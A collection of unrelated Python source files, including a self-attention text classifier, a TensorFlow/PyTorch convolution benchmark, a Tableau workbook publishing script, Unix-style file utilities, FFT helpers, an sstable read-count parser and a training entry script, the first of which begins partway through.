# filtered_dobj_dict = filter_dict(verb_dobj_amod_dict)
filtered_nsubj_dict = verb_nsubj_amod_dict
filtered_dobj_dict = verb_dobj_amod_dict
while True:
command = input('Please give me your interested word(QUIT means quit this program):')
if command == 'QUIT':
break
else:
if command in filtered_nsubj_dict:
print('Top 5 nsubj adj:', filtered_nsubj_dict[command])
else:
print('There is no nsubj adj record for verb:', command)
if command in filtered_dobj_dict:
print('Top 5 dobj adj:', filtered_dobj_dict[command])
else:
print('There is no dobj adj record for verb:', command)
print('end')
|
import numpy as np
import tensorflow as tf
import sys
import time
from sklearn.metrics import f1_score
import random
class hisan(object):
'''
hierarchical self-attention network
parameters:
- embedding_matrix: numpy array
numpy array of word embeddings
each row should represent a word embedding
NOTE: the word index 0 is dropped, so the first row is ignored
- num_classes: int
number of output classes
- max_sents: int
maximum number of sentences/lines per document
- max_words: int
maximum number of words per sentence/line
- attention_heads: int (default: 8)
number of attention heads to use in multihead attention
- attention_size: int (default: 512)
dimension size of output embeddings from attention
- dropout_keep: float (default: 0.9)
dropout keep rate for embeddings and attention softmax
- activation: tensorflow activation function (default: tf.nn.elu)
activation function to use for feature extraction
- lr: float (default: 0.0001)
learning rate for adam optimizer
methods:
- train(data,labels,batch_size=64,epochs=30,patience=5,
validation_data,savebest=False,filepath=None)
train network on given data
- predict(data)
return the predicted labels for given data
- score(data,labels)
return the micro and macro f-scores of predicted labels on given data
- save(filepath)
save the model weights to a file
- load(filepath)
load model weights from a file
'''
def __init__(self,embedding_matrix,num_classes,max_sents,max_words,attention_heads=8,
attention_size=512,dropout_keep=0.9,activation=tf.nn.elu,lr=0.0001):
self.dropout_keep = dropout_keep
self.dropout = tf.placeholder(tf.float32)
self.ms = max_sents
self.mw = max_words
self.embedding_matrix = embedding_matrix.astype(np.float32)
self.attention_size = attention_size
self.attention_heads = attention_heads
self.activation = activation
#doc input
self.doc_input = tf.placeholder(tf.int32, shape=[None,max_sents,max_words])
self.doc_embeds = tf.map_fn(self._attention_step,self.doc_input,dtype=tf.float32)
#classification functions
output = tf.layers.dense(self.doc_embeds,num_classes,
kernel_initializer=tf.contrib.layers.xavier_initializer())
self.prediction = tf.nn.softmax(output)
#loss, accuracy, and training functions
self.labels = tf.placeholder(tf.int32,shape=[None])
self.loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=output,labels=self.labels))
self.optimizer = tf.train.AdamOptimizer(lr,0.9,0.99).minimize(self.loss)
#init op
self.saver = tf.train.Saver()
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
def _attention_step(self,doc):
words_per_line = tf.math.count_nonzero(doc,1)
num_lines = tf.math.count_nonzero(words_per_line)
max_words_ = tf.reduce_max(words_per_line)
doc_input_reduced = doc[:num_lines,:max_words_]
num_words = words_per_line[:num_lines]
#word embeddings
word_embeds = tf.gather(tf.get_variable('embeddings',
initializer=self.embedding_matrix,dtype=tf.float32),
doc_input_reduced)
word_embeds = tf.nn.dropout(word_embeds,self.dropout)
#masking
mask_base = tf.cast(tf.sequence_mask(num_words,max_words_),tf.float32)
mask = tf.tile(tf.expand_dims(mask_base,2),[1,1,self.attention_size])
mask2 = tf.tile(tf.expand_dims(mask_base,2),[self.attention_heads,1,max_words_])
#word self attention
Q = tf.layers.conv1d(word_embeds,self.attention_size,1,
padding='same',activation=self.activation,
kernel_initializer=tf.contrib.layers.xavier_initializer())
K = tf.layers.conv1d(word_embeds,self.attention_size,1,
padding='same',activation=self.activation,
kernel_initializer=tf.contrib.layers.xavier_initializer())
V = tf.layers.conv1d(word_embeds,self.attention_size,1,
padding='same',activation=self.activation,
kernel_initializer=tf.contrib.layers.xavier_initializer())
Q = tf.multiply(Q,mask)
K = tf.multiply(K,mask)
V = tf.multiply(V,mask)
Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
K_ = tf.concat(tf.split(K,self.attention_heads,axis=2),axis=0)
V_ = tf.concat(tf.split(V,self.attention_heads,axis=2),axis=0)
outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
outputs = tf.where(tf.equal(outputs,0),tf.ones_like(outputs)*-1000,outputs)
outputs = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
word_self = tf.multiply(outputs,mask2)
outputs = tf.matmul(word_self,V_)
outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
outputs = tf.multiply(outputs,mask)
#word target attention
Q = tf.get_variable('word_Q',(1,1,self.attention_size),
tf.float32,tf.orthogonal_initializer())
Q = tf.tile(Q,[num_lines,1,1])
Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
K_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
V_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
outputs = tf.where(tf.equal(outputs,0),tf.ones_like(outputs)*-1000,outputs)
word_target = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
outputs = tf.matmul(word_target,V_)
outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
sent_embeds = tf.transpose(outputs,[1,0,2])
sent_embeds = tf.nn.dropout(sent_embeds,self.dropout)
#sent self attention
Q = tf.layers.conv1d(sent_embeds,self.attention_size,1,
padding='same',activation=self.activation,
kernel_initializer=tf.contrib.layers.xavier_initializer())
K = tf.layers.conv1d(sent_embeds,self.attention_size,1,
padding='same',activation=self.activation,
kernel_initializer=tf.contrib.layers.xavier_initializer())
V = tf.layers.conv1d(sent_embeds,self.attention_size,1,
padding='same',activation=self.activation,
kernel_initializer=tf.contrib.layers.xavier_initializer())
Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
K_ = tf.concat(tf.split(K,self.attention_heads,axis=2),axis=0)
V_ = tf.concat(tf.split(V,self.attention_heads,axis=2),axis=0)
outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
sent_self = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
outputs = tf.matmul(sent_self,V_)
outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
#sent target attention
Q = tf.get_variable('sent_Q',(1,1,self.attention_size),
tf.float32,tf.orthogonal_initializer())
Q_ = tf.concat(tf.split(Q,self.attention_heads,axis=2),axis=0)
K_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
V_ = tf.concat(tf.split(outputs,self.attention_heads,axis=2),axis=0)
outputs = tf.matmul(Q_,tf.transpose(K_,[0, 2, 1]))
outputs = outputs/(K_.get_shape().as_list()[-1]**0.5)
sent_target = tf.nn.dropout(tf.nn.softmax(outputs),self.dropout)
outputs = tf.matmul(sent_target,V_)
outputs = tf.concat(tf.split(outputs,self.attention_heads,axis=0),axis=2)
doc_embed = tf.nn.dropout(tf.squeeze(outputs,[0]),self.dropout)
doc_embed = tf.squeeze(doc_embed,[0])
return doc_embed
def train(self,data,labels,batch_size=64,epochs=30,patience=5,
validation_data=None,savebest=False,filepath=None):
'''
train network on given data
parameters:
- data: numpy array
3d numpy array (doc x sentence x word ids) of input data
- labels: numpy array
1d numpy array of labels for given data
- batch size: int (default: 64)
batch size to use for training
- epochs: int (default: 30)
number of epochs to train for
- patience: int (default: 5)
training stops after no improvement in validation score
for this number of epochs
- validation_data: tuple (optional)
tuple of numpy arrays (X,y) representing validation data
- savebest: boolean (default: False)
set to True to save the best model based on validation score per epoch
- filepath: string (optional)
path to save model if savebest is set to True
outputs:
None
'''
if savebest==True and filepath==None:
raise Exception("Please enter a path to save the network")
if validation_data:
validation_size = len(validation_data[0])
else:
validation_size = len(data)
print('training network on %i documents, validation on %i documents' \
% (len(data), validation_size))
#track best model for saving
prevbest = 0
pat_count = 0
for ep in range(epochs):
#shuffle data
xy = list(zip(data,labels))
random.shuffle(xy)
data,labels = zip(*xy)
data = list(data)
labels = list(labels)
y_pred = []
y_true = []
start_time = time.time()
#train
for start in range(0,len(data),batch_size):
#get batch index
if start+batch_size < len(data):
stop = start+batch_size
else:
stop = len(data)
feed_dict = {self.doc_input:data[start:stop],
self.labels:labels[start:stop],
self.dropout:self.dropout_keep}
pred,cost,_ = self.sess.run([self.prediction,self.loss,self.optimizer],
feed_dict=feed_dict)
#track correct predictions
y_pred.append(np.argmax(pred,1))
sys.stdout.write("epoch %i, sample %i of %i, loss: %f \r"\
% (ep+1,stop,len(data),cost))
sys.stdout.flush()
#checkpoint after every epoch
print("\ntraining time: %.2f" % (time.time()-start_time))
y_pred = np.concatenate(y_pred,0)
micro = f1_score(labels,y_pred,average='micro')
macro = f1_score(labels,y_pred,average='macro')
print("epoch %i training micro/macro: %.4f, %.4f" % (ep+1,micro,macro))
micro,macro = self.score(validation_data[0],validation_data[1],
batch_size=batch_size)
print("epoch %i validation micro/macro: %.4f, %.4f" % (ep+1,micro,macro))
#save if performance better than previous best
if micro >= prevbest:
prevbest = micro
pat_count = 0
if savebest:
self.save(filepath)
else:
pat_count += 1
if pat_count >= patience:
break
#reset timer
start_time = time.time()
def predict(self,data,batch_size=64):
'''
return the predicted labels for given data
parameters:
- data: numpy array
3d numpy array (doc x sentence x word ids) of input data
- batch size: int (default: 64)
batch size to use during inference
outputs:
1d numpy array of predicted labels for input data
'''
y_pred = []
for start in range(0,len(data),batch_size):
#get batch index
if start+batch_size < len(data):
stop = start+batch_size
else:
stop = len(data)
feed_dict = {self.doc_input:data[start:stop],self.dropout:1.0}
prob = self.sess.run(self.prediction,feed_dict=feed_dict)
y_pred.append(np.argmax(prob,1))
sys.stdout.write("processed %i of %i records \r" \
% (stop,len(data)))
sys.stdout.flush()
print()
y_pred = np.concatenate(y_pred,0)
return y_pred
def score(self,data,labels,batch_size=64):
'''
return the micro and macro f-score of predicted labels on given data
parameters:
- data: numpy array
3d numpy array (doc x sentence x word ids) of input data
- labels: numpy array
1d numpy array of labels for given data
- batch size: int (default: 64)
batch size to use during inference
outputs:
tuple of floats (micro,macro) representing micro and macro f-score
of predicted labels on given data
'''
y_pred = self.predict(data,batch_size)
micro = f1_score(labels,y_pred,average='micro')
macro = f1_score(labels,y_pred,average='macro')
return micro,macro
def save(self,filename):
'''
save the model weights to a file
parameters:
- filepath: string
path to save model weights
outputs:
None
'''
self.saver.save(self.sess,filename)
def load(self,filename):
'''
load model weights from a file
parameters:
- filepath: string
path from which to load model weights
outputs:
None
'''
self.saver.restore(self.sess,filename)
if __name__ == "__main__":
'''
dummy test data
'''
#params
batch_size = 64
lr = 0.0001
epochs = 5
train_samples = 10000
test_samples = 10000
vocab_size = 750
max_lines = 50
max_words = 10
num_classes = 10
embedding_size = 100
attention_heads = 4
attention_size = 64
#create data
vocab = np.random.rand(vocab_size,embedding_size)
X = np.random.randint(1,vocab_size,
(train_samples+test_samples,max_lines,max_words))
#test train split
X_train = X[:train_samples]
X_test = X[train_samples:]
y_train = np.random.randint(0,num_classes,train_samples)
y_test = np.random.randint(0,num_classes,test_samples)
#train model
model = hisan(vocab,num_classes,max_lines,max_words,
attention_heads,attention_size,lr=lr)
model.train(X_train,y_train,batch_size,epochs,
validation_data=(X_test,y_test)) |
import numpy as np
import tensorflow as tf
import torch
from torch.nn import functional as F
def createCircularMask(h, w, center=None, radius=None):
if center is None: # use the middle of the image
center = [int(w / 2), int(h / 2)]
if radius is None: # use the smallest distance between the center and image walls
radius = min(center[0], center[1], w - center[0], h - center[1])
Y, X = np.ogrid[:h, :w]
dist_from_center = np.sqrt((X - center[0]) ** 2 + (Y - center[1]) ** 2)
mask = dist_from_center <= radius
return mask * 1.0
def makeGaussian(size, sigma=3, center=None):
""" Make a square gaussian kernel.
size is the length of a side of the square
fwhm is full-width-half-maximum, which
can be thought of as an effective radius.
"""
x = np.arange(0, size, 1, float)
y = x[:, np.newaxis]
if center is None:
x0 = y0 = size // 2
else:
x0 = center[0]
y0 = center[1]
return np.exp(-((x - x0) ** 2 + (y - y0) ** 2) / (2.0 * sigma ** 2))
# return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / sigma ** 2)
def check_shape_image(image):
if len(image.shape) == 2:
return image[np.newaxis, ..., np.newaxis]
elif len(image.shape) == 3 and image.shape[-1] != image.shape[-2]:
return image[np.newaxis, ...]
elif len(image.shape) == 3 and image.shape[0] != image.shape[1]:
return image[..., np.newaxis]
return image
def check_shape_kernel(kernel, x):
if len(kernel.shape) == 2:
kernel = np.stack([kernel] * x.shape[-1], axis=-1)
return kernel[..., np.newaxis]
elif len(kernel.shape) == 3:
return kernel[..., np.newaxis]
return kernel
def cnn2d_depthwise_tf(image: np.ndarray,
filters: np.ndarray):
features_tf = tf.nn.depthwise_conv2d(image[None], filters,
strides=[1, 1, 1, 1], padding='SAME')
return features_tf[0]
@tf.function
def cnn2d_tf(image: np.ndarray,
filters: np.ndarray):
features_tf = tf.nn.conv2d(image[None], filters, strides=[1, 1, 1, 1],
padding='SAME')
return features_tf[0]
@tf.function
def cnn2d_depthwise_tf_transpose(image: np.ndarray,
filters: np.ndarray):
image = tf.transpose(image, perm=[2, 1, 0])[None]
features_tf = tf.nn.depthwise_conv2d(image, filters,
strides=[1, 1, 1, 1], padding='SAME',
data_format="NCHW")
return tf.transpose(features_tf[0], perm=[2, 1, 0])
def convert_to_torch(image, filters):
image_torch = torch.tensor(image.transpose([2, 1, 0])[None])
filters_torch = torch.tensor(filters.transpose([3, 2, 1, 0]))
return image_torch, filters_torch
def cnn2d_depthwise_torch(image: np.ndarray,
filters: np.ndarray):
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
image_torch, filters_torch = convert_to_torch(image, filters)
image_torch, filters_torch = image_torch.to(device), filters_torch.to(device)
df, _, cin, cmul = filters.shape
filters_torch = filters_torch.transpose(0, 1).contiguous()
filters_torch = filters_torch.view(cin * cmul, 1, df, df)
features_torch = F.conv2d(image_torch, filters_torch, padding=df // 2,
groups=cin)
features_torch_ = features_torch.cpu().numpy()[0].transpose([2, 1, 0])
return features_torch_
def cnn2d_torch(image: np.ndarray,
filters: np.ndarray):
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
image_torch, filters_torch = convert_to_torch(image, filters)
image_torch, filters_torch = image_torch.to(device), filters_torch.to(device)
df, _, cin, cmul = filters.shape
features_torch = F.conv2d(image_torch, filters_torch, padding=df // 2)
features_torch_ = features_torch.cpu().numpy()[0].transpose([2, 1, 0])
return features_torch_
if __name__ == "__main__":
import matplotlib.pyplot as plt
import datetime
import time
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def plot_image(image):
fig, ax = plt.subplots(nrows=1, ncols=3)
ax[0].imshow(image[..., 0])
ax[1].imshow(image[..., 1])
ax[2].imshow(image[..., 2])
plt.show()
# g1 = makeGaussian(21, 1)
# g2 = makeGaussian(21, 2)
# g3 = makeGaussian(21, 1, (3, 3))
g1 = createCircularMask(21, 21, radius=4)
g2 = createCircularMask(21, 21, radius=5)
g3 = createCircularMask(21, 21, [3, 3], radius=3)
gauss_image = np.stack([g1, g2, g3], axis=-1)
plot_image(gauss_image)
gauss_kernel = np.stack([makeGaussian(5, 1)] * 3, axis=-1)
plot_image(gauss_kernel)
tf_convolved = cnn2d_depthwise_tf(gauss_image,
check_shape_kernel(gauss_kernel,
gauss_image))
plot_image(tf_convolved)
torch_convolved = cnn2d_depthwise_torch(gauss_image,
check_shape_kernel(gauss_kernel,
gauss_image))
plot_image(torch_convolved)
print('difference between pytorch and tf ',
np.mean(tf_convolved - torch_convolved))
iters = 100000
start_time = time.time()
for i in range(iters):
tf_convolved = cnn2d_tf(gauss_image,
check_shape_kernel(gauss_kernel,
gauss_image))
time_usage = str(datetime.timedelta(
seconds=int(round(time.time() - start_time))))
print("Time usage conv2d TF2: " + time_usage, flush=True)
start_time = time.time()
for i in range(iters):
torch_convolved = cnn2d_torch(gauss_image,
check_shape_kernel(gauss_kernel,
gauss_image))
time_usage = str(datetime.timedelta(
seconds=int(round(time.time() - start_time))))
print("Time usage conv2d Torch: " + time_usage, flush=True)
start_time = time.time()
for i in range(iters):
tf_convolved = cnn2d_depthwise_tf(gauss_image,
check_shape_kernel(gauss_kernel,
gauss_image))
time_usage = str(datetime.timedelta(
seconds=int(round(time.time() - start_time))))
print("Time usage depth_wise_conv2d TF2: " + time_usage, flush=True)
start_time = time.time()
for i in range(iters):
torch_convolved = cnn2d_depthwise_torch(gauss_image,
check_shape_kernel(gauss_kernel,
gauss_image))
time_usage = str(datetime.timedelta(
seconds=int(round(time.time() - start_time))))
print("Time usage depth_wise_conv2d Torch: " + time_usage, flush=True)
# With @tf.function
# Time usage conv2d TF2: 0:00:21
# Time usage conv2d Torch: 0:00:14
# Time usage depth_wise_conv2d TF2: 0:00:17
# Time usage depth_wise_conv2d Torch: 0:00:10
# No @ tf function
# Time usage conv2d TF2: 0:00:24
# Time usage conv2d Torch: 0:00:14
# Time usage depth_wise_conv2d TF2: 0:00:32
# Time usage depth_wise_conv2d Torch: 0:00:10 |
####
# This script demonstrates how to use the Tableau Server API
# to publish a workbook to a Tableau server. It will publish
# a specified workbook to the 'default' project of the given server.
#
# Note: The REST API publish process cannot automatically include
# extracts or other resources that the workbook uses. Therefore,
# a .twb file with data from a local computer cannot be published,
# unless packaged into a .twbx file.
#
# For more information, refer to the documentations on 'Publish Workbook'
# (https://onlinehelp.tableau.com/current/api/rest_api/en-us/help.htm)
#
# To run the script, you must have installed Python 2.7.9 or later.
####
import tableauserverclient as TSC
import argparse
import getpass
import logging
parser = argparse.ArgumentParser(description='Publish a workbook to server.')
parser.add_argument('--server', '-s', required=True, help='server address')
parser.add_argument('--username', '-u', required=True, help='username to sign into server')
parser.add_argument('--filepath', '-f', required=True, help='filepath to the workbook to publish')
parser.add_argument('--logging-level', '-l', choices=['debug', 'info', 'error'], default='error',
help='desired logging level (set to error by default)')
args = parser.parse_args()
password = getpass.getpass("Password: ")
# Set logging level based on user input, or error by default
logging_level = getattr(logging, args.logging_level.upper())
logging.basicConfig(level=logging_level)
# Step 1: Sign in to server.
tableau_auth = TSC.TableauAuth(args.username, password)
server = TSC.Server(args.server)
with server.auth.sign_in(tableau_auth):
# Step 2: Get all the projects on server, then look for the default one.
pagination_info, all_projects = server.projects.get()
default_project = next((project for project in all_projects if project.is_default()), None)
# Step 3: If default project is found, form a new workbook item and publish.
if default_project is not None:
new_workbook = TSC.WorkbookItem(default_project.id)
new_workbook = server.workbooks.publish(new_workbook, args.filepath, server.PublishMode.Overwrite)
print("Workbook published. ID: {0}".format(new_workbook.id))
else:
error = "The default project could not be found."
raise LookupError(error)
|
"""
Unix functions wrapped in Python
"""
import os
import random
import shutil
import socket
import time
from seisflows.tools.tools import iterable
def cat(src, *dst):
"""
Concatenate files and print on standard output
"""
with open(src, 'r') as f:
contents = f.read()
if not dst:
print(contents)
else:
with open(dst, 'w') as f:
f.write(contents)
def cd(path):
"""
Change directory
"""
os.chdir(path)
def cp(src='', dst=''):
"""
Copy files
:type src: str or list or tuple
:param src: source to copy from
:type dst: str
:param dst: destination to copy to
"""
if isinstance(src, (list, tuple)):
if len(src) > 1:
assert os.path.isdir(dst), "unexpected type for unix.cp 'dst'"
for sub in src:
cp(sub, dst)
return
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
if os.path.isdir(dst):
for sub in ls(src):
cp(os.path.join(src, sub), dst)
return
if os.path.isfile(src):
shutil.copy(src, dst)
elif os.path.isdir(src):
shutil.copytree(src, dst)
def hostname():
"""
Check the hostname
"""
return socket.gethostname().split('.')[0]
def ln(src, dst):
"""
Make a symbolic link
"""
dst = os.path.abspath(dst)
if os.path.isdir(dst):
for name in iterable(src):
s = os.path.abspath(name)
d = os.path.join(dst, os.path.basename(name))
os.symlink(s, d)
else:
os.symlink(src, dst)
def ls(path):
"""
List directory contents
"""
dirs = os.listdir(path)
for dir_ in dirs:
if dir_[0] == '.':
dirs.remove(dir_)
return dirs
def mkdir(dirs):
"""
Make directory
Note: Random wait times to prevent overloading disk
:type dirs: str or list
:param dirs: pathnames to make
"""
time.sleep(2 * random.random())
for dir_ in iterable(dirs):
if not os.path.isdir(dir_):
os.makedirs(dir_)
def mv(src='', dst=''):
"""
Move contents
"""
if isinstance(src, (list, tuple)):
if len(src) > 1:
assert os.path.isdir(dst), "unexpected type for 'dst' in unix.mv"
for sub in src:
mv(sub, dst)
return
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
shutil.move(src, dst)
def rename(old, new, names):
"""
Rename multiple files
:type old: str
:param old: expression to replace
:type new: str
:param new: replacement expression
:type names: list
:param names: files to replace expressions in
"""
for name in iterable(names):
if name.find(old) >= 0:
os.rename(name, name.replace(old, new))
def rm(path=''):
"""
Remove files or directories
"""
for name in iterable(path):
if os.path.isfile(name):
os.remove(name)
elif os.path.islink(name):
os.remove(name)
elif os.path.isdir(name):
shutil.rmtree(name)
def select(items, prompt=''):
"""
Monitor file descriptors, waiting for one or more descriptor to be "ready"
"""
while True:
if prompt:
print(prompt)
for i, item in enumerate(items):
print(f"{i+1:2d}) {item}")
try:
reply = int(input().strip())
status = (1 <= reply <= len(items))
except (ValueError, TypeError, OverflowError):
status = 0
if status:
return items[reply - 1]
def touch(filename, times=None):
"""
Update timestamps on files
:type filename: str
:param filename: file to touch
:type times: None or (atime, mtime)
:param times: if None, set time to current time, otherwise
(accesstime, modifiedtime) need to be set
"""
with open(filename, 'a'):
os.utime(filename, times)
def which(name):
"""
Shows the full path of shell commands
:type name: str
:param name: name of shell command to check
"""
def isexe(file):
return os.path.isfile(file) and os.access(file, os.X_OK)
dirname, filename = os.path.split(name)
if dirname:
if isexe(name):
return name
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
fullname = os.path.join(path, name)
if isexe(fullname):
return fullname
else:
return None
|
import numpy as np
import tensorflow as tf
def split_reim(array):
"""Split a complex valued matrix into its real and imaginary parts.
Args:
array(complex): An array of shape (batch_size, N, N) or (batch_size, N, N, 1)
Returns:
split_array(float): An array of shape (batch_size, N, N, 2) containing the real part on one channel and the imaginary part on another channel
"""
real = np.real(array)
imag = np.imag(array)
split_array = np.stack((real, imag), axis=3)
return split_array
def split_reim_tensor(array):
"""Split a complex valued tensor into its real and imaginary parts.
Args:
array(complex): A tensor of shape (batch_size, N, N) or (batch_size, N, N, 1)
Returns:
split_array(float): A tensor of shape (batch_size, N, N, 2) containing the real part on one channel and the imaginary part on another channel
"""
real = tf.math.real(array)
imag = tf.math.imag(array)
split_array = tf.stack((real, imag), axis=3)
return split_array
def split_reim_channels(array):
"""Split a complex valued tensor into its real and imaginary parts.
Args:
array(complex): A tensor of shape (batch_size, N, N) or (batch_size, N, N, 1)
Returns:
split_array(float): A tensor of shape (batch_size, N, N, 2) containing the real part on one channel and the imaginary part on another channel
"""
real = tf.math.real(array)
imag = tf.math.imag(array)
n_ch = array.get_shape().as_list()[3]
split_array = tf.concat((real, imag), axis=3)
return split_array
def join_reim(array):
"""Join the real and imaginary channels of a matrix to a single complex-valued matrix.
Args:
array(float): An array of shape (batch_size, N, N, 2)
Returns:
joined_array(complex): An complex-valued array of shape (batch_size, N, N, 1)
"""
joined_array = array[:, :, :, 0] + 1j * array[:, :, :, 1]
return joined_array
def join_reim_tensor(array):
"""Join the real and imaginary channels of a matrix to a single complex-valued matrix.
Args:
array(float): An array of shape (batch_size, N, N, 2)
Returns:
joined_array(complex): A complex-valued array of shape (batch_size, N, N)
"""
joined_array = tf.cast(array[:, :, :, 0], 'complex64') + \
1j * tf.cast(array[:, :, :, 1], 'complex64')
return joined_array
def join_reim_channels(array):
"""Join the real and imaginary channels of a matrix to a single complex-valued matrix.
Args:
array(float): An array of shape (batch_size, N, N, ch)
Returns:
joined_array(complex): A complex-valued array of shape (batch_size, N, N, ch/2)
"""
ch = array.get_shape().as_list()[3]
joined_array = tf.cast(array[:,
:,
:,
:int(ch / 2)],
dtype=tf.complex64) + 1j * tf.cast(array[:,
:,
:,
int(ch / 2):],
dtype=tf.complex64)
return joined_array
def convert_to_frequency_domain(images):
"""Convert an array of images to their Fourier transforms.
Args:
images(float): An array of shape (batch_size, N, N, 2)
Returns:
spectra(float): An FFT-ed array of shape (batch_size, N, N, 2)
"""
n = images.shape[1]
spectra = split_reim(np.fft.fft2(join_reim(images), axes=(1, 2)))
return spectra
def convert_tensor_to_frequency_domain(images):
"""Convert a tensor of images to their Fourier transforms.
Args:
images(float): A tensor of shape (batch_size, N, N, 2)
Returns:
spectra(float): An FFT-ed tensor of shape (batch_size, N, N, 2)
"""
n = images.shape[1]
spectra = split_reim_tensor(tf.signal.fft2d(join_reim_tensor(images)))
return spectra
def convert_to_image_domain(spectra):
"""Convert an array of Fourier spectra to the corresponding images.
Args:
spectra(float): An array of shape (batch_size, N, N, 2)
Returns:
images(float): An IFFT-ed array of shape (batch_size, N, N, 2)
"""
n = spectra.shape[1]
images = split_reim(np.fft.ifft2(join_reim(spectra), axes=(1, 2)))
return images
def convert_tensor_to_image_domain(spectra):
"""Convert an array of Fourier spectra to the corresponding images.
Args:
spectra(float): An array of shape (batch_size, N, N, 2)
Returns:
images(float): An IFFT-ed array of shape (batch_size, N, N, 2)
"""
n = spectra.shape[1]
images = split_reim_tensor(tf.signal.ifft2d(join_reim_tensor(spectra)))
return images
|
#!/usr/bin/env python
import os
import string
import sys
sys.path.insert(0, "../../../util/python")
import Util
fn_in = None
fn_out = None
class ReadCnt:
def __init__(self, r, fp, tp):
self.reads = r
self.bf_fp = fp
self.bf_tp = tp
self.bf_n = r - fp - tp
self.reads_miss = r - tp
def __str__(self):
return "%8d %4d %7d %8d %8d" % (self.reads, self.bf_fp, self.bf_tp, self.bf_n, self.reads_miss)
def __add__(self, r):
return ReadCnt(
self.reads + r.reads,
self.bf_fp + r.bf_fp,
self.bf_tp + r.bf_tp)
def __sub__(self, r):
return ReadCnt(
self.reads - r.reads,
self.bf_fp - r.bf_fp,
self.bf_tp - r.bf_tp)
def ReadInputAndGenFormattedFile():
global fn_in
last_line = None
with open(fn_in) as fo:
for line in fo.readlines():
# print line
if len(line) == 0:
continue
if line[0] == "#":
continue
last_line = line
if last_line == None:
raise RuntimeError("Can't find the last line")
time = None
sst_readcnt = {}
t = last_line.split()
#print len(t)
for i in range(len(t)):
if i == 0:
time = t[i]
continue
elif i == 1:
# replace decimal point , with .
time += ("-" + string.replace(t[i], ",", "."))
continue
t2 = t[i].split(":")
if len(t2) != 2:
raise RuntimeError("Unexpected format: [%s] [%s]" % (last_line, t2))
sstable_gen = int(t2[0])
t3 = t2[1].split(",")
if len(t3) != 3:
raise RuntimeError("Unexpected format: [%s] [%s]" % (last_line, t2))
read_cnt = int(t3[0])
bf_fp_cnt = int(t3[1])
bf_tp_cnt = int(t3[2])
sst_readcnt[sstable_gen] = ReadCnt(read_cnt, bf_fp_cnt, bf_tp_cnt)
with open(fn_out, "w") as fo:
fo.write("# time: %s\n" % time)
fo.write("#\n")
fmt = "%2d %8d %4d %7d %8d %8d"
header = Util.BuildHeader(fmt, "sstable_gen read_cnt bf_fp_cnt bf_tp_cnt(read_hit) bf_n_cnt read_miss")
fo.write(header)
for k, v in sorted(sst_readcnt.iteritems()):
fo.write("%2d %s\n" % (k, v))
print "Created file %s %d" % (fn_out, os.path.getsize(fn_out))
def main(argv):
if len(argv) != 2:
print "Usage: %s fn_in" % (argv[0])
sys.exit(1)
global fn_in
global fn_out
fn_in = argv[1]
fn_out = fn_in + "-by-sstables"
ReadInputAndGenFormattedFile()
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
"""Main.
The main script that is called to run everything else.
Author:
Yvan Satyawan <y_satyawan@hotmail.com>
"""
from platform import system
from trainer import Trainer
from utils.slacker import Slacker
from os import getcwd
from os.path import join
import warnings
import traceback
try:
import curses
except ImportError:
if system() == "Windows":
pass
else:
warnings.warn("Running on a non-Windows OS without curses. Command line"
" usage will not be possible.",
ImportWarning)
def run_training(arguments, iaa, silence=False):
"""Main function that runs everything.
Args:
arguments (dict): The arguments given by the user.
silence (bool): Additional argument used only by batch_train to allow
for silent running, i.e. it doesn't require the user to type
anything to move to the next training session. Defaults to False.
"""
# Get the curses window ready by setting it to None
stdscr = None
try:
if arguments["cmd_line"]:
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
try:
curses.curs_set(0)
except:
pass
# Get the trainer object ready
if arguments["train"]:
# Run in training mode
trainer = Trainer(iaa, arguments["learning_rate"],
arguments['optimizer'],
arguments['loss_weights'],
stdscr,
loss_criterion=arguments['criterion'])
trainer.set_network(arguments['network'], arguments['pretrained'],
arguments['px_coordinates'])
data = arguments['train']
elif arguments['validate']:
# Run for validation
trainer = Trainer(iaa, cmd_line=stdscr,
validation=arguments['validate'],
loss_criterion=arguments['criterion'])
trainer.set_network(arguments['network'], arguments['pretrained'],
arguments['px_coordinates'])
data = arguments['validate']
elif arguments['infer']:
raise NotImplementedError("Inference is not yet implemented.")
else:
raise ValueError("Must run in one of the possible modes.")
# Run training or validation
if arguments['train'] or arguments['validate']:
trainer.train(data, arguments['batch_size'],
arguments['epochs'], arguments['plot'],
arguments['weights'], arguments['augment'],
silent=silence)
finally:
if stdscr is not None:
stdscr.clear()
curses.echo()
curses.nocbreak()
try:
curses.curs_set(1)
except:
pass
curses.endwin()
exception_encountered = traceback.format_exc(0)
if "SystemExit" in exception_encountered \
or "KeyboardInterrupt" in exception_encountered \
or "None" in exception_encountered:
return
else:
print("I Died")
print(exception_encountered)
